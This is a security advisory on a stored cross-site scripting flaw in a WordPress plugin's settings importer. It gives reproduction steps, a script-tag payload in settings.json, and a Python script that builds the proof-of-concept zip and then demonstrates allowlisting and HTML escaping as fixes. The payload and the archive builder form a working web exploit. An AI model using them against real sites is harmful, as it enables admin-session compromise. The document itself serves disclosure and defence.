The plugin does not sanitise or escape the settings imported from a previous export, allowing high-privilege users (such as an administrator) to inject arbitrary JavaScript into the admin panel. Because the imported values are stored and rendered without escaping, this works even when the unfiltered_html capability is disabled, as it is by default for non-super-admins in a multisite setup.
To reproduce this vulnerability, follow the steps below:

1. Generate a JSON file with the following content:

   {"ccss":{"rules":"{\"paths\":{\"foo\":{\"hash\":0,\"file\":\"<script>alert(`Stoooored XSS`)</script>\"}}}"}}

   Save this file with the name "settings.json" (the importer requires this exact filename). Note that the "rules" value is itself a JSON-encoded string, so the inner quotes must be escaped as shown.

2. Compress "settings.json" into a zip archive with any name. The backend only accepts uploads with the .zip extension.

3. In the "Critical CSS" section of the plugin's admin page, select the zip file and click the "Import Settings" button. The payload is triggered immediately upon upload, since the imported "file" value is written into the admin page unescaped.
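The following script is an added example, not part of the original report or the plugin's code. It builds the proof-of-concept archive exactly as steps 1 and 2 describe, shows the importer behaviour that the report implies (the nested "rules" string is decoded and stored as-is), and then shows the two checks a safe importer would apply: validate each "file" value against an allowlist on input, and escape it on output. The `SAFE_FILE` pattern is an assumption about what a critical-CSS path looks like; the plugin's real import handler is not on this page.

```python
import html
import io
import json
import re
import zipfile

# Payload taken verbatim from the report. The outer JSON carries "rules" as a
# JSON-encoded string, so an importer has to decode it twice.
PAYLOAD = (
    '{"ccss":{"rules":"{\\"paths\\":{\\"foo\\":{\\"hash\\":0,'
    '\\"file\\":\\"<script>alert(`Stoooored XSS`)</script>\\"}}}"}}'
)

# Assumption (hypothetical): a stored critical-CSS file reference is a relative
# path made of [A-Za-z0-9._/-] that ends in ".css". Adjust to the plugin's scheme.
SAFE_FILE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]*\.css$")


def build_poc_zip() -> bytes:
    """Steps 1-2: settings.json (the name is required) inside a zip of any name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("settings.json", PAYLOAD)
    return buf.getvalue()


def read_rules(zip_bytes: bytes) -> dict:
    """Vulnerable importer shape: decode the archive and the nested rules
    string, returning the attacker-controlled structure untouched."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        settings = json.loads(zf.read("settings.json"))
    return json.loads(settings["ccss"]["rules"])


def sanitize_rules(rules: dict) -> dict:
    """Hardened importer: keep only entries whose fields have the expected
    types and whose file value matches the allowlist; drop everything else."""
    clean = {}
    for key, entry in rules.get("paths", {}).items():
        if not isinstance(entry, dict):
            continue
        h, f = entry.get("hash"), entry.get("file")
        if isinstance(h, int) and isinstance(f, str) and SAFE_FILE.match(f):
            clean[key] = {"hash": h, "file": f}
    return {"paths": clean}


def render_file_cell(entry: dict) -> str:
    """Escape on output, the equivalent of esc_html() in WordPress: even if a
    bad value reached the database, the admin page renders it as text."""
    return "<td>%s</td>" % html.escape(entry["file"], quote=True)


if __name__ == "__main__":
    poc = build_poc_zip()
    with open("poc.zip", "wb") as fh:  # upload this via "Import Settings"
        fh.write(poc)
    raw = read_rules(poc)
    print("stored unsanitised:", raw["paths"]["foo"]["file"])
    print("after sanitize_rules:", sanitize_rules(raw))
    print("escaped on output:", render_file_cell(raw["paths"]["foo"]))
```

Running the script writes poc.zip next to it; the printed lines show the raw script tag surviving the vulnerable decode path, the allowlist dropping the "foo" entry entirely, and the escaped form that would render harmlessly. Input validation and output escaping are both shown because either alone closes this particular report, but only the combination protects against a value that reaches the database through some other path.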
Juampa Rodríguez
2023-05-02